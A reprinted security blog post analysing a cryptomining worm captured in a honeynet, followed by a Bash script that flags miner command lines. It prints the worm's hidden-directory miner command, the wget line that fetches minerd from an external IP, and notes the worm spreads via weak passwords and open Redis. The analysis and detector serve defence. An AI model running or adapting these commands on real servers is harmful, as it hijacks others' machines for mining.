Mining - Mrxn's Blog - focused on web security, in love with hacker technology

Get on the bus, HD and uncensored: a real worm mining example

Let me share a wild way to get rich in cyberspace: worm mining of Bitcoin and other virtual currencies. What follows is a real case we captured. The door has been opened a crack; explore the rest yourself, lest we be suspected of being the bad guys.




Early this morning, an interesting string appeared in our honeynet system:


[email protected]


ProtonMail! Our post from some time ago (Recommending a secure and anonymous mailbox: ProtonMail) now looks like something of a coincidence, which naturally aroused our interest. Unsurprisingly, anonymity is a double-edged sword: at its other edge, the "evil of anonymity" brings the ugliness of human nature to its extreme.


As I said before, the law of the dark forest also applies to cyberspace: be found, be killed. Sorry, this time we were the ones doing the "killing".


The complete content of the above string is:


(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x &> /dev/null &)


Let me briefly explain this Bash command:


1. exec runs the command that follows in place of the current shell process; look up the details yourself.

2. /var/tmp/.war/1 is a file dropped by the following command:

wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1

3. The file 1 is minerd itself.

4. The parameters passed to minerd:

-a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

At first glance this is about mining currencies such as Bitcoin, because minergate.com is exactly such a mining platform: evil, yet legal.

5. &> /dev/null discards both standard output and standard error.

6. The trailing & runs the command in the background.

7. The outermost parentheses () run the whole thing in a new subshell.

Those are the seven points; the fourth is the key one.
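As an added example (not code from the original post, and not the worm's own code), here is a small Bash triage helper that pulls the indicators explained above out of a captured command line and scores it: the stratum pool URL and -a algorithm, a binary staged in a hidden directory under /var/tmp, and output discarded while the job is backgrounded. The sample command strings, the placeholder address user@example.com and the scoring threshold are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post or the worm): triage a captured
# command line for the miner indicators explained above. Sample strings and
# the user@example.com address are constructed; the pool host and drop path
# mirror the captured case for illustration only.

# Prints "host:port algo" when $1 carries a stratum pool URL; fails otherwise.
miner_indicators() {
    local cmd="$1" pool algo
    pool=$(printf '%s\n' "$cmd" | grep -oE 'stratum[+](tcp|ssl)://[^[:space:]]+' | head -n1)
    [ -n "$pool" ] || return 1
    pool=${pool#*://}
    algo=$(printf '%s\n' "$cmd" | grep -oE -e '-a +[A-Za-z0-9_-]+' | head -n1 | awk '{print $2}')
    printf '%s %s\n' "$pool" "${algo:-unknown}"
}

# Succeeds when a hidden directory under a world-writable temp path is used
# (the /var/tmp/.war/1 staging pattern from the capture).
hidden_tmp_drop() {
    printf '%s\n' "$1" | grep -qE '(/var/tmp|/tmp|/dev/shm)/\.[^[:space:]/]+'
}

# Prints one summary line: verdict, score and the extracted pool/algorithm.
# Constructed threshold: a pool URL alone (2 points) is enough to flag.
classify_cmd() {
    local cmd="$1" score=0 ind="" verdict
    if ind=$(miner_indicators "$cmd"); then score=$((score + 2)); fi
    if hidden_tmp_drop "$cmd"; then score=$((score + 1)); fi
    # Discarding all output and backgrounding is only a weak supporting signal.
    case "$cmd" in
        *'&> /dev/null'*|*'>/dev/null 2>&1'*) score=$((score + 1)) ;;
    esac
    if [ "$score" -ge 2 ]; then verdict=miner; else verdict=clean; fi
    printf 'verdict=%s score=%d pool=%s algo=%s\n' \
        "$verdict" "$score" "${ind%% *}" "${ind#* }"
}

# Constructed samples: the captured pattern with a placeholder address, and a
# benign backup job that only shares the "silent and backgrounded" traits.
SAMPLE_MINER='(exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u user@example.com -p x &> /dev/null &)'
SAMPLE_BENIGN='rsync -a /srv/www/ backup:/srv/www/ >/dev/null 2>&1 &'

classify_cmd "$SAMPLE_MINER"   # verdict=miner score=4 pool=xmr.pool.minergate.com:45560 algo=cryptonight
classify_cmd "$SAMPLE_BENIGN"  # verdict=clean score=1 pool= algo=
```

The same functions can be fed lines from a honeynet command log or from `ps -eo args` on a suspect host; the benign sample shows why the redirect-and-background trait alone should not raise an alert.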


To confirm our first impression, we used our only official email address, [email protected], to register an account on minergate.com as well. After spending some time on this platform, I have to sigh: the world of mining is truly dazzling, with treasure everywhere you look.


On this platform, we found the following link of mining instructions:


https://minergate.com/altminers/cpuminer-multi-wolf


Screenshots of some areas are as follows:



The content in the red box is:


minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x


Compare this with the fourth point above: confirmed, isn't it? The miner itself is also open source, so it can be modified and recompiled to suit special requirements.


Back to the beginning: this worm is really nothing new. It spreads mainly through weak passwords and a few Linux server vulnerabilities (such as unauthenticated access to Redis).


Infect 10,000 servers with this worm and you have 10,000 mining nodes.


Never mind 0days: with a few ancient techniques one can become "rich" in this cyberspace that is at once robust and fragile.


Fortunately, we are not bad people.




Is this case clear enough? Want to see more? Polished into plain language by "Lazy People Are Thinking", it guarantees that even readers who don't understand the technology will learn something.


Cyberspace, this huge brain, is truly beautiful.

Note: Reprinted from Yu Xuanda's WeChat official account


admin Published on 2017-3-6 19:36